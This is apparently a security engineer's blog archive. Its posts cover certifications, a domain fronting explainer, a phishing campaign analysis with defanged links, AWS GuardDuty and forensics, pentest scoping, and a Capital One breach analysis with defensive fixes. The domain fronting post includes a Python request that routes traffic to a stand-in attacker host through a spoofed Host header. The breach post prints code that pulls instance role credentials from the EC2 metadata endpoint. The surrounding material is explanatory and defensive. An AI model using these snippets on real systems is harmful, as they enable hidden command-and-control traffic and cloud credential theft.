So long, Cisco! Why I am purposefully letting my CCNP expire

Hi friends! Cisco sent me this letter letting me know my CCNP/CCNA will expire.

I am letting it expire. Here is why.

My goals have changed. I got my CCNP back in 2002 and renewed it several times. I spent the first part of my career as an aspiring Network Engineer, and letting go of it now is a little sad. My journey as a Net Eng led me into Information Security. As a Security Engineer, I do think it is important to understand and keep current on routing concepts, like BGP and routing in the Cloud. Last year, I sat the AWS Networking Specialty exam. Moving forward, I'd rather spend my precious study hours on certifications that make me better at my job, like Kali Linux Certified Professional and OSCP, than on re-taking a Cisco test on Spanning Tree.

The world has changed. There once was a time when every small and medium-sized company NEEDED Cisco routers and switches! There was a time when many companies ran their own data centers. Some still do, yes – but the shift to public Cloud has clearly happened. Cloud is where the expertise is needed today and in the future. There is still a need for Cisco Certified professionals, but that need will center on the slice of the Fortune 500 that chooses to run on-prem networking or internal, private clouds. Governments and large telcos will probably leverage Cisco gear for a long time as well. Please understand, I am not saying Cisco certs are no longer needed, because they are – it's just that the playing field is different today.

Cisco's CCNP has not changed (much). I wrestled with this before – check out my post from three years ago. The switching test today is pretty much the same as it was then. The 300-115 SWITCH exam is old – they only update it every three years. The good news is that the three-year cycle is up and Cisco is updating the CCNP tests in 2020. Still, how much of this content will focus on legacy data center tech?

There is a Cisco CCNP Cloud certification – but this track focuses on Cisco Cloud tech only, with technologies like unified fabric, UCS, ACI, etc. Cisco Cloud is different from the Google, Azure, Alibaba, and AWS public cloud offerings; Cisco cloud technology focuses on empowering orgs to run their own internal clouds. Again, there is a need for private cloud tech, but how great a need?

In conclusion, because of my professional path, the direction of technology, and the direction of Cisco, I am not renewing my CCNP. I will spend my time on other certifications instead.

I must say that Cisco was a huge help to me at the start of my career, and I feel gratitude toward the folks there who ran the certification program in the early days, helping engineers like me build needed skills and get acknowledged and recognized for them. I am grateful. Thank you, Cisco.

Note: This blog and the opinions in it are 100% my own, and in no way reflect those of any present or previous employer.  This blog is not associated with any company.

Posted in Uncategorized

NGINX Moscow Office Raided!

Hi friends. I received an interesting letter from Gus Robertson <gus.robertson@nginx.com> letting me know that NGINX's Moscow office was raided by police!

 

The referenced ZDNet article corroborates the email. Also, here is a link to a photo of the search warrant, originally posted on Twitter.

Between those two links, you have most of the details surrounding the raid. However, what is not in those two links, I will comment on and dive into a bit here:

What makes this whole thing interesting is that F5 now owns NGINX. It is eyebrow-raising that F5 says in the letter that they are “not a party” to the intellectual property that is in dispute. Well, what is the IP exactly?

From ZDNet: “The Moscow police executed the raid after last week the Rambler Group filed a copyright violation against NGINX Inc., claiming full ownership of the NGINX web server code.”

When F5 bought NGINX, did they not also purchase the referenced disputed IP? It is not clear to me why F5 would say they are “not a party”. Maybe some corporate veil between F5 and NGINX gives them the right to legally state that. And/or they may be attempting to keep the F5 name squeaky clean and not tie the F5 name and F5 software to Russia and Russians. Damage control.

The other interesting part of the letter I received is that F5 only took measures to secure the master builds for NGINX products AFTER THE RAID. That basically says that the master builds of the referenced NGINX products were not secured prior to the raid. Is there any other way to read that?

What is not said in their letter is interesting…

1. According to ZDNet, “Equipment was seized and employees were detained for questioning“. Equipment was seized. If I am a customer, was any of MY data seized? Letting customers know would seem to be priority one for F5, if they have not already done so.

2. The letter states that none of the master builds are on Russian servers (as of the time the letter was written?). But were the master builds of the mentioned products on Russian servers BEFORE the raid?

3. Why did F5 not tell customers that the MD5 file hashes of all the build files, from both before and after the raid, were in fact the same?
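That kind of statement is what would actually reassure customers: published hashes let anyone verify that a build they downloaded is bit-for-bit the build the vendor intended. Here is a minimal sketch in Python, with a hypothetical file name and a placeholder digest (and note that a modern hash like SHA-256 is a better choice than MD5):

import hashlib

def sha256_of(path: str) -> str:
    # Hash the file in 1 MB chunks so large build artifacts need not fit in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical check: compare against a digest published by the vendor.
print(sha256_of("nginx-plus-build.tar.gz") == "<digest published by vendor>")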

The fact that F5 is saying the master builds were not secured prior to this raid really bothers me. I know some of the builds may have been open source, but NGINX Plus, UNIT, and WAF (which are all referenced in the letter) are not.

It will be interesting to watch this play out.

Note: This blog and the opinions in it are 100% my own, and in no way reflect those of any present or previous employer.  This blog is not associated with any company.

 

Posted in Uncategorized

How Domain Fronting Attacks work. Explained in seven steps

Domain Fronting attacks were one of the top 5 attacks listed in material that came out of the RSA 2019 Conference as a way for attackers to obfuscate their activities. This was of high interest to me, so I dug in.

Formally, Domain Fronting is a technique leveraged by threat actors to use high-reputation domains to disguise C2 (command and control) callbacks from both the user and security tool sets.

Domain Fronting attacks work in Content Delivery Networks (CDNs). CDNs are leveraged by companies who want to put themselves ‘closer’ to the customer; the company allows the CDN to cache specific elements of the application on CDN-owned Points of Presence (POPs) that are geographically close to the customer base. To do this, the CDN will also host the SSL web certificate of the domain. This is where we get started.

1. Attacker sets up their own server on the same CDN as the target company (the target company is the company whose legitimate SSL certificate is intended to disguise callbacks to the attacker's C2 network). For example, let's say the legitimate domain with an SSL cert is Henson.com, hosted on a CDN. The attacker's server is on the same CDN.

2. Initial malware callback to the legitimate domain. The attacker's malware, resident on an internal corporate network (having gotten there via phishing or other means), makes its initial callback. However, the callback does not go to an attacker-owned domain; instead, it goes to the legitimate domain, Henson.com, hosted on the CDN. This step simply sets up a TLS session between the malware endpoint and the Henson.com property on the CDN.

3. User and security tools are fooled. The DNS resolution and the following call look like any other web call to a legitimate domain, and the browser trusts the certificate.

4. Malware makes a second call to the attacker-owned resource in the same CDN as Henson.com, hidden via the HTTP/1.1 Host header inside the valid TLS connection.

5. Request is routed. The CDN fronts this second request as if it were for Henson.com, but once it unwraps the TLS, it reads the HTTP/1.1 Host header and re-routes the request to the attacker's server on the CDN.

6. Another redirect. The attacker, not wanting their activity to be discovered by the CDN, simply has their server in the CDN do a second redirect to an off-CDN command and control server anywhere in the world. From the CDN's point of view, there is nothing nefarious there, just a redirect . . .

7. The command and control channel is set up. At this point, the redirect to the off-CDN command and control server completes, so the full C2 path is established:

Infected host inside corp network -> CDN -> Henson.com on CDN -> attacker's redirect server on CDN -> attacker C2. And it is completely hidden.
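To make steps 2 through 5 concrete, here is a minimal sketch of a fronted request in Python. The attacker domain is a hypothetical stand-in: TLS (SNI and certificate validation) is negotiated for the high-reputation domain, while the HTTP/1.1 Host header steers the CDN to the attacker's property.

import requests

# TLS handshake and certificate are for henson.com (the fronting domain);
# the Host header names the attacker's real destination inside the CDN.
resp = requests.get(
    "https://henson.com/",
    headers={"Host": "attacker-owned.example"},
    timeout=10,
)
print(resp.status_code)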

Defending Against Domain Fronting

As a security defender, your best defense against Domain Fronting is a proxy server, configured for TLS interception, that all internet connections leaving your corporate network must traverse. You can configure your proxy server to ensure the HTTP/1.1 Host header matches the domain in the URL (and in the TLS SNI). If the domains do not match, you can overwrite the header and log (and alert) on the action.
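One way to sketch that check, assuming mitmproxy is doing the TLS interception (this is an illustrative addon, not a drop-in production control):

from mitmproxy import ctx, http

class FrontingCheck:
    def request(self, flow: http.HTTPFlow) -> None:
        sni = flow.client_conn.sni        # domain named in the TLS handshake
        host = flow.request.host_header   # domain named in the HTTP/1.1 Host header
        if sni and host and sni.lower() != host.split(":")[0].lower():
            ctx.log.warn(f"Possible domain fronting: SNI={sni} Host={host}")
            flow.request.host_header = sni  # overwrite to match, per the defense above

addons = [FrontingCheck()]

Run it with mitmproxy -s fronting_check.py and watch the event log for the warning.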

Another defense technique to think about: ensure you don't have any dangling DNS / CDN-fronted resources that the CDN would route to an origin host that is no longer present.

Also, taking several steps back: the walkthrough above assumed malware was already present and making a callback. Strong host security, code signing, and application whitelisting can help prevent the malware from running in the first place.

Stay safe, friends!

 

Disclaimer: This blog is private and independent. This blog is not associated with AWS or Amazon in any way.
Posted in Cyber Security, Phishing, RSA, Technical

Is Azure lowering the bar on their certification exams?

Hi friends. I want to take a different approach today and offer some speculation on something that caught my eye. This is only speculation, so please keep that in mind as you read.

Scrolling through LinkedIn on my phone, I came across this post, which I have pasted below (identity of the poster purposefully removed):

Anything strike you as strange here? As  you know, it was announced publicly last weekend that Microsoft won the JEDI contract.

My theory is this: Microsoft recently re-graded tests on a lower curve to increase the number of Azure-certified individuals. Perhaps to support the JEDI initiative? The timing of the contract award and the above post seems like quite a coincidence... but hey, maybe I am just a paranoid security guy.

At present there are no good data sources with actual current certification counts to put some data behind the theory. However, according to a recent Cloud Security Alliance (CSA) report, AWS is the most popular public cloud infrastructure platform, comprising 41.5% of application workloads in the public cloud.

Therefore, it would stand to reason that there are MORE AWS-certified individuals than Azure-certified individuals supporting those cloud workloads. Microsoft may simply be trying to level the talent playing field by retroactively re-grading exams.

The Azure certification program hit some bumps last year as well, and Microsoft re-vamped it after feedback from the community that the tests were “too broad”.

Okay, it's time to end ‘theory hour’ and get back to working on facts. Stay safe!

 

Disclaimer: This blog is private and independent. This blog is not associated with AWS or Amazon in any way. The opinions of this blog are my own, NOT those of Amazon.
Posted in Azure Certification

New GuardDuty Alerts worth mentioning

Amazon recently added a few notable GuardDuty alert types to help detect some known attack types. I have been following, studying, and blogging about AWS GuardDuty since it was released, and it has been amazing to watch the innovation in this product since its inception.

The first new alert is:

UnauthorizedAccess:EC2/MetadataDNSRebind

is interesting because it is designed to detect attacks very similar to the recent Capital One attack, where the attacker queried the EC2 metadata service as one of the key steps in the attack kill chain. Put simply, this alert will fire when an EC2 instance in your AWS environment queries a domain that resolves to the EC2 metadata IP address, 169.254.169.254.

Per Amazon, “A DNS query of this kind may indicate that the instance is a target of a DNS Rebinding technique which can be used to obtain metadata from an EC2 instance, including the IAM credentials associated with the instance.”

The second alert (with a very descriptive name)

Stealth:IAMUser/S3ServerAccessLoggingDisabled

basically does exactly what its name says – tells you that someone shut off S3 server access logging on a particular bucket. I imagine the false positives with this would be low; there are not many reasons to disable logging on a bucket, except perhaps billing shock or a bucket being decommissioned. Otherwise, it is a strong indicator of bucket tampering. Keeping access logging on (and alerting when it is disabled) would also help you detect someone uploading bad content to your bucket, such as in this attack, where the threat actors added malicious code to S3 buckets to be served on websites.
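If you wire this finding into automation, turning logging back on is a single API call. Here is a minimal boto3 sketch (bucket names are placeholders, and the target bucket must already grant S3's log delivery write access):

import boto3

s3 = boto3.client("s3")

def reenable_access_logging(bucket: str, log_bucket: str) -> None:
    # Turn server access logging back on for the tampered bucket.
    s3.put_bucket_logging(
        Bucket=bucket,
        BucketLoggingStatus={
            "LoggingEnabled": {"TargetBucket": log_bucket, "TargetPrefix": bucket + "/"}
        },
    )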

Last, this alert falls into the same category of bucket tampering:

Policy:IAMUser/S3BlockPublicAccessDisabled

Same deal here: this one basically says ‘your bucket is public now’ (where it was not before). This is to detect staging for data exfiltration, where a bucket could be leveraged as a temporary storehouse before moving data out of the company completely.
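A matching remediation sketch, again with boto3 (bucket name is a placeholder): re-apply all four Block Public Access settings the moment the finding fires.

import boto3

s3 = boto3.client("s3")

def reblock_public_access(bucket: str) -> None:
    # Restore the bucket-level Block Public Access configuration.
    s3.put_public_access_block(
        Bucket=bucket,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )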

Enjoy and Stay Safe!

Disclaimer: This blog is private and independent. This blog is not associated with AWS or Amazon in any way.

Posted in Uncategorized

The SalsaCentralDenver Phishing Campaign – Exclusive

Sometime on or before Friday, October 18th, the email account belonging to Salsa Central Denver was compromised.

What is not in their courtesy notice is that the attacker(s) leveraged the info@salsacentraldenver.com email account to initiate a phishing campaign. By sending phish emails from this domain, spam filters would likely not match existing blacklists and flag the phish. I know they got through Gmail's spam filter.

Here are screenshots of the three phishing emails, pretending to be notifications from Amazon, American Express, and Chase. All of these arrived within a few minutes of each other. Take a look just below. The address these phish are sourced from is info@salsacentraldenver.com.

 

The hook links [middle button on each phish] are similar, all going to the rs6.net domain:

Fake Chase:
hxxp://r20.rs6.net/tn.jsp?f=001JXpTPVvaw8Za5wyc1tOV4IIhr1iiO8uXOX87_fRPtuJwbDK_vDhnf4HwdFkGvSGRscR_ng0dB0JFoiI5CKok1-6r0jbU8WZmt8GKLYtPhQJWMMynae3b8SVzdB64k1mK9Pn0GgiHAGT1kVux-WnfAU8aVfStiVYO&c=xxAs40ZUomXSX50x5PKouuoDD1CCTH6LmgL9CIvuC2zDIV7TuHfVGw==&ch=VngmDcyiYPxmM6aPlukgrMJvhmrUlm7hD5GS1o7_RCgNuNFtM098Kw==
Fake Amazon: 
hxxp://r20.rs6.net/tn.jsp?f=001DxKEhl7FukUIG9W_XeNKfQPgYA9tL1aW7OH0SV0OWC8K8kCWWZEhxxMjdmdkNCYC3fJ879jKnJ2-7uQbdVuRp0nVIUhH3CRVz2lofPLxGdSWxu25PqUHq51QnWbsSxjOgdHozJNVkQn1QE-OqpoQ_ggef2aO76ju&c=omRnvkKXUlD65znA5wavcPaptpm3fezuTe8WLpm7GHcsbL4Eutqizg==&ch=w2FTck3mc9gPFnwErfcKfSpEbl8mYFGCyCO6vruOtRKwhIqtQszjrA==
Fake American Express:
hxxp://r20.rs6.net/tn.jsp?f=001Aml9EoWQ0-q8cJjCstWSyaC_dOeY8h6R3Tb-l49kHQanU3nI0FnQJahiWHyc_3C0yQmuBAV79HS5N9IpQguXghqMEKJKIw6q2Ab6gII-27zn3xQkTWiigeLBB41nLr31QeQ6IF5SHWgALNPxNj96EQ==&c=OacERVHNGaWMdOx_kyHBrz5Ip90v2h2_NtQyKNpsMgkeTMcDogp0PA==&ch=YHjVBwhFVH0IPJHnwpxit_w76o9betL9tcYy5aqlP3J3m5emxZX4Jw==

This is where it gets weird. A whois lookup for rs6.net shows it belongs to markmonitor.com.

MarkMonitor appears to be a reputable security company, but the emails came from a known account hack. Why would the hackers go through the trouble of compromising an email account only to route their links through a domain belonging to a supposedly legitimate anti-phishing / anti-fraud company? It gets even stranger when I open a sandbox VM and follow one of the links. Keep reading.

So… I start a pcap on my sandbox VM and follow the fake Amazon link:

Fake Amazon: hxxp://r20.rs6.net/tn.jsp?f=001DxKEhl7FukUIG9W_XeNKfQPgYA9tL1aW7OH0SV0OWC8K8kCWWZEhxxMjdmdkNCYC3fJ879jKnJ2-7uQbdVuRp0nVIUhH3CRVz2lofPLxGdSWxu25PqUHq51QnWbsSxjOgdHozJNVkQn1QE-OqpoQ_ggef2aO76ju&c=omRnvkKXUlD65znA5wavcPaptpm3fezuTe8WLpm7GHcsbL4Eutqizg==&ch=w2FTck3mc9gPFnwErfcKfSpEbl8mYFGCyCO6vruOtRKwhIqtQszjrA==

I am first redirected by the MarkMonitor-owned domain to a new domain, hxxp://81-op-0-1.com

And…

It seems the only purpose of this redirect is to redirect again, to hxxp://02-02-002.com. Obfuscation?
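If you want to map a chain like this yourself, a small sketch that follows one redirect at a time (instead of letting the HTTP library auto-follow) makes each hop visible. Only do this from a disposable sandbox, against links you have deliberately re-armed from their defanged hxxp form:

import requests

def walk_redirects(url: str, max_hops: int = 10) -> None:
    # Print each hop of a redirect chain without auto-following it.
    for _ in range(max_hops):
        resp = requests.get(url, allow_redirects=False, timeout=10)
        print(resp.status_code, url)
        location = resp.headers.get("Location")
        if not location:
            break
        url = location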

From my capture, I see the DNS resolution resolving 02-02-002.com to 143.95.237.93, which is owned by Athenix. This matters because that IP is actually hosting the fake content, as you'll see if you keep reading.

The hxxp://02-02-002.com link takes me to a copy of the real Amazon site:

Ok – all of that noted, let's get on with giving these guys what they want. When I get to the page, the fake Amazon asks me for my email, so I make something up and put it in.

Next, I am presented with a second screen, so I make some stuff up and fill this out as well.

Oh, we're not done. Screen number three is where it gets good: they want my credit card number. Now I am thinking, I wonder what all of this has to do with MarkMonitor?

The form works and it is actually uploading my data. A sniff of the HTTP traffic shows the POST with “my credit card”:

After hitting continue… more stuff. They want the password to the email account I originally supplied. Sure… let's give them access…

After hitting Continue one more time, I am actually redirected to the REAL Amazon.com!

This is a real phish alright. These guys asked for an email account + password, and my credit card. So why did MarkMonitor just collect PCI and PII data from me? They didn't. The fake sites are all hosted at 02-02-002.com. I think MarkMonitor has lost control of one of their subdomains, and the hacker placed the first redirect there.

 

Stay tuned for more + Stay safe!

Posted in Phishing

Two handy AWS API calls for forensics

A little while ago, I wrote a blog post on how to use Lambda to shut down a compromised instance. The idea was to quickly detect and remediate an instance that AWS GuardDuty intrusion detection flagged as infected.

To add forensic investigation capability to that automation, take a look at a couple more API calls to add to your function.

For volume forensics, create a forensic volume snapshot after your instance is stopped:

aws ec2 create-snapshot --volume-id vol-1234567890abcdef0 --description "This is my root volume snapshot"

or Python

import boto3

ec2 = boto3.resource('ec2')
# Create a point-in-time snapshot of the volume for offline analysis.
volume = ec2.Volume('vol-1234567890abcdef0')
snapshot = volume.create_snapshot(Description='This is my root volume snapshot')

The snapshot allows you to investigate the volume without compromising the evidence (the original volume) in an investigation.

For memory forensics, think about automation to hibernate the instance. Yes, instead of stopping the instance, if you are running certain flavors of Linux (i.e., the instance meets the prerequisites for hibernation), you can place the instance into hibernation instead.

Per AWS, here is what happens when an instance is hibernated:

“When you hibernate an instance, we signal the operating system to perform hibernation (suspend-to-disk), which saves the contents from the instance memory (RAM) to your Amazon EBS root volume. We persist the instance’s Amazon EBS root volume and any attached Amazon EBS data volumes. When you restart your instance, the Amazon EBS root volume is restored to its previous state, the RAM contents are reloaded, and the processes that were previously running on the instance are resumed. Previously attached data volumes are reattached and the instance retains its instance ID. “

For CLI:

The instance has to be launched with hibernation enabled:

aws ec2 run-instances --image-id ami-0abcdef1234567890 --instance-type m5.large --hibernation-options Configured=true --count 1 --key-name MyKeyPair

and hibernate is a parameter on stop-instances . . .

aws ec2 stop-instances --instance-ids i-1234567890abcdef0 --hibernate
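Or in Python, a minimal boto3 sketch (the instance ID is a placeholder):

import boto3

ec2 = boto3.client('ec2')
# Hibernate instead of a plain stop; RAM is written to the EBS root volume
# so memory contents survive for later forensic analysis.
ec2.stop_instances(InstanceIds=['i-1234567890abcdef0'], Hibernate=True)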

This feature was released about a year ago and, as you can see, only supports limited instance and volume types; however, it is great for forensics on memory-resident malware.

Additional Forensic information

EC2 Forensics SANS Paper

Digital Forensics AWS Paper

Incident Response in AWS BlackHat Paper

Top 3 Open Source tools for AWS Incident Response

 

Stay Safe Friends!

Posted in Uncategorized

The importance of Scope and Rules of Engagement in a Penetration Test

Hi friends! An interesting story appeared on theregister.co.uk about a pair of professional penetration testers getting arrested after attempting a physical break-in at their client's building.

Crazy, right? The core of the story is that, YES – they were hired by this client to perform a penetration test to access computer records; however, the client apparently did not sanction testing physical security controls as part of the test.

Oftentimes, too much emphasis is put on the excitement of running an exploit and gaining a foothold in a network, finding the goods / capturing the flag as it were… and no one seems to be having the conversations about preparedness. You know, all of the things that happen before a pentest.

Rule 1 is to get permission before doing anything pentest-related. This takes the form of a legal contract between you and the client. (If it's your own company, get formal sign-off at a senior executive level.)

Rule 2 is to determine and document the scope of the test. The outcome of this workflow will actually be referenced as part of the permission document in Rule 1. Scope, in a broad sense, is simply what you are allowed to do as a pentester. What networks are you testing against? What hosts? Only internal parts of the network? Is social engineering allowed as part of this test? Is this a black box (covert) pentest, or a white box pentest where building security and the IT security team know what's up? Am I allowed to plug equipment into the network? Am I testing in the DEV, TEST, or PROD environment? Are physical security controls at the facility housing the computer systems in scope? These questions are not all-encompassing, but they provide a decent example – you get the idea. The scoping document is signed off by all executive parties (legal), and it is apparently what the two aforementioned gentlemen did not have in their engagement.

From the referenced Article: “The bureaucrats were, however, unaware the tests could also involve physical break-ins, it is claimed.”

Rule 3 is to determine the Rules of Engagement. “Well, Chris, you just said if they had a scoping document, everything would be OK. What gives?” Rules of Engagement guide the pentester's actions when specific findings, events, or circumstances occur during a test.

For the case above, the Rules of Engagement document would state that if a physical alarm is tripped, the pentester must approach building security, building security must verify the pentester's identity, and then call the Sheriff to let them know this was a security exercise. Or, if this was a silent alarm, the protocol might have been to display a temporary badge to the arresting officers, along with a phone number for a senior executive who could be contacted to verify identities if needed.

More specifically, though: what happens if a critical (unexpected) finding is uncovered that puts the company at risk? Do we stop the pentest? If I see a vulnerability on a box, can I run a Metasploit module against it, or do I just report the vulnerability? If I run an exploit on a box and it breaks the box, what do I do? The Rules of Engagement tell me this. You get the idea.

I don't think our friends had this one sorted out either, as there appeared to be no protocol for the pentesters to rely upon when the police showed up that would have kept them out of jail, and no protocol for building security / the alarm company (other than to call the police).

So, the takeaway: definitely spend your time making sure you, your team, and the client are on the same page with regard to all aspects and details of the penetration test!

You can find the Official Scoping and Rules of Engagements worksheets here:

https://pen-testing.sans.org/resources/downloads

And NEVER, NEVER run a test without written, legal permission. Verbal will not do. Ever.

Stay safe, friends!

Posted in Uncategorized

Capital One Breach: Henson's take + preventing and detecting

There has been lots of media coverage of the recent Capital One hack; however, I have not been able to find a great technical write-up on it. In this post, I hypothesize what happened based on data that has been publicly released.

The Legal Complaint against the accused has the following summary:

“A Firewall Misconfiguration permitted commands to reach and be executed by that server, which enabled access to folders or buckets of data in Capital One’s Storage space at the Cloud Computing Company”

“..the first command, when executed, obtained security credentials for an account known as ****-WAF-Role, that in turn enabled access to certain of Capital One’s Folders at the Cloud Computing Company”

“..the second command, when executed used the ****-WAF-Role account to list the names of the folders or buckets..”

“…the third command (the Sync Command) when executed, used the ****-WAF Role to extract or copy data from those folders or buckets.. ”

Let's speculate on the firewall (WAF) misconfiguration in the first quote, assuming the WAF is running on an ‘instance’. The WAF misconfiguration could have been some stale or default credentials, combined with a management interface that was assigned a public IP address visible to the world.

Speculating on the first command: once inside the firewall, some type of command-line access was obtained, and a call was issued to the cloud provider's metadata endpoint, which provides information about that instance – and temporary access keys could have been derived from that data. If the ephemeral keys were obtained, then the subsequent programmatic calls to list buckets and sync would have been permitted.
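For a sense of what such a call looks like, here is a sketch in Python of the classic instance metadata pattern, run from a shell on the instance itself. The role name echoes the redacted ****-WAF-Role from the complaint and is purely a placeholder:

import requests

# The instance metadata endpoint answers only from inside the instance;
# no credentials are needed to ask it for the role's temporary keys.
base = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
role = requests.get(base, timeout=2).text.strip()      # e.g. "example-WAF-Role"
creds = requests.get(base + role, timeout=2).json()
# creds contains AccessKeyId, SecretAccessKey, and Token for the instance role.
print(creds["AccessKeyId"])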

How could this have been detected?

Much of my writing to this point has been speculative, but we do know this one fact: there was a download.

Yes, to me the big callout for detection here is that reports say 30 GB of data was moved.

To do this kind of data movement, you'd need a persistent connection. We also know the hacker was using a VPN, so that persistent connection was encrypted. Third, the client IP of the VPN is an IP that Capital One does not own. Those three metrics provide a sweet KPI for detecting unauthorized downloads:

1. Persistent connection moving significant data

2. Connection is encrypted with keys not owned by the company

3. Connection is traversing to an IP not owned by the company.

If you are monitoring your traffic, either by mirroring it to a security tool that can look for these metrics or by using ML built into IDS/IPS systems, the above KPI is one for InfoSec first responders to watch for and investigate. A sketch of the idea is just below.
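As an illustration of metrics 1 and 3 (who owns the encryption keys is not visible in flow data), here is a hedged sketch over parsed VPC Flow Log records, represented as dicts with hypothetical src, dst, and bytes keys. It totals bytes per connection to IPs outside company-owned ranges and flags large transfers:

from collections import defaultdict
from ipaddress import ip_address, ip_network

OWNED = [ip_network("10.0.0.0/8"), ip_network("198.51.100.0/24")]  # placeholder ranges
THRESHOLD = 5 * 1024**3  # flag anything over ~5 GB to a single external peer

def flag_exfil(records):
    # Sum bytes per (src, dst) pair where the destination is not company-owned.
    totals = defaultdict(int)
    for r in records:
        if not any(ip_address(r["dst"]) in net for net in OWNED):
            totals[(r["src"], r["dst"])] += r["bytes"]
    return {pair: b for pair, b in totals.items() if b > THRESHOLD}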

Detection is a must! Prevention, we do our best.

Preventing an attack like this comes down to the Principle of Least Privilege. (You thought I was going to say fix the firewall, right?) Really, it is about fixing permissions for the instance on which the firewall is running. For instance, the WAF instance in question would not need a role that could:

1. Access Folders/Buckets directly

2. Assume another role that could access folders and buckets directly.

So, a lot of this is locking down those privileges and understanding what each policy does when it is attached to a principal. Combing through all of those with a fine-tooth comb is a key part of an enterprise Identity and Access Management program.
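To make "locking down" concrete, here is a hedged illustration of a tightly scoped inline policy for such a role, applied with boto3. Every name here is a placeholder, not Capital One's actual configuration; the point is that the role can write its own logs and nothing else:

import json
import boto3

iam = boto3.client("iam")

# Hypothetical least-privilege policy: the WAF role may only write objects
# into its own log bucket; no listing buckets, no reading data folders.
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:PutObject"],
        "Resource": "arn:aws:s3:::example-waf-logs/*",
    }],
}
iam.put_role_policy(
    RoleName="example-WAF-Role",
    PolicyName="waf-least-privilege",
    PolicyDocument=json.dumps(policy),
)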

Netflix takes an automated approach to this with a couple of tools, Repokid and Aardvark. In short, the tools proactively examine the environment, look at which permissions are actually used, and then automatically trim away any that are not needed. Take a look!

I hope this was helpful to you.

Stay safe, friends!

The opinions of this blog do not necessarily reflect those of Amazon. This blog is not an official publication of Amazon or associated with Amazon.com.

Posted in Uncategorized

Resources for Protecting against Public S3 Bucket Exposure

Hi friends – it's been a while. My new gig is kicking my butt! I am growing and learning quite a lot, for sure. I need to keep good information coming, so when I saw this story about third-party-developed Facebook app datasets being exposed due to a misconfigured bucket permission, I felt compelled to put together some ways to help remediate this.

Although ACLs and bucket policies are great for protecting against leaky buckets for those who understand AWS and IAM very well, they are not something one picks up in 30 seconds – so I think some people avoid learning them in order to get their jobs done fast. Also, I think there is a general lack of security awareness in the wild, so people do things to get a job done quickly without thinking through the implications of what they are doing… like making buckets public. I believe these two reasons are at the dead center of all of the bucket leaks you read about in the papers.

First, let’s talk about detecting public buckets.

AWS has done a good job adding additional methods to detect public buckets. A year or so ago, a little icon appeared in the console next to any public bucket when looking at your buckets in the S3 menu:

That made it a bit more obvious, but it still was not enough. AWS then made it so Trusted Advisor reports could check S3 access and flag public buckets.

Also, to take a quick detour into the inventory aspect of information security: think about leveraging Amazon Macie to detect when certain data types (PII) are in S3 buckets and to see how that data is being accessed.

That's nice, but let's take some action…

Next, you can integrate Trusted Advisor with CloudWatch so you can take action on Trusted Advisor's checks. But this will only fire AFTER Trusted Advisor has run… so it is still not quite enough to stop bucket leaks that occur in between Trusted Advisor runs.

The next level up, and one of my favorites, is using AWS Config to monitor and respond to public buckets. This is powerful because it requires no human interaction… almost. The Lambda script in the linked tutorial only notifies when a bucket permission has been changed. To fully automate, I really recommend that you customize the script and add some teeth to it, so it will remediate the bucket policy itself. An example script is here, and a minimal sketch of the idea follows.
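The sketch below shows the shape of such a remediation handler, with the event parsing deliberately simplified (a real AWS Config event nests the bucket name deeper; treat the extraction as a placeholder):

import boto3

s3 = boto3.client("s3")

def handler(event, context):
    # Reset a non-compliant bucket: private ACL plus Block Public Access.
    bucket = event["bucket"]  # placeholder; parse from your Config event shape
    s3.put_bucket_acl(Bucket=bucket, ACL="private")
    s3.put_public_access_block(
        Bucket=bucket,
        PublicAccessBlockConfiguration={
            "BlockPublicAcls": True,
            "IgnorePublicAcls": True,
            "BlockPublicPolicy": True,
            "RestrictPublicBuckets": True,
        },
    )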

Problem still not solved, you say – a user should not even be allowed to set their own bucket permissions? Could not agree more… so…

I’d rather just prevent S3 Public Access in the first place.

Now there is Amazon S3 Block Public Access, which gives the account administrator more power to block users from introducing ACLs with open permissions onto a bucket in the first place, by blocking this at the account level.
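Turning it on account-wide is one call to the S3 Control API. A minimal boto3 sketch (the account ID is a placeholder):

import boto3

s3control = boto3.client("s3control")
# Apply Block Public Access across the entire account, overriding
# bucket-level settings.
s3control.put_public_access_block(
    AccountId="111122223333",
    PublicAccessBlockConfiguration={
        "BlockPublicAcls": True,
        "IgnorePublicAcls": True,
        "BlockPublicPolicy": True,
        "RestrictPublicBuckets": True,
    },
)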

And last would sit a corporate security policy prohibiting the creation of any kind of public share on any cloud or third-party service without explicit permission from the security team. Yearly education on, and acknowledgement of, this policy by every employee is a must.

I hope this helps! Stay Safe! Stay Secure!

The opinions of this blog do not necessarily reflect those of Amazon. This blog is not an official publication of Amazon or associated with Amazon.com.
Posted in Uncategorized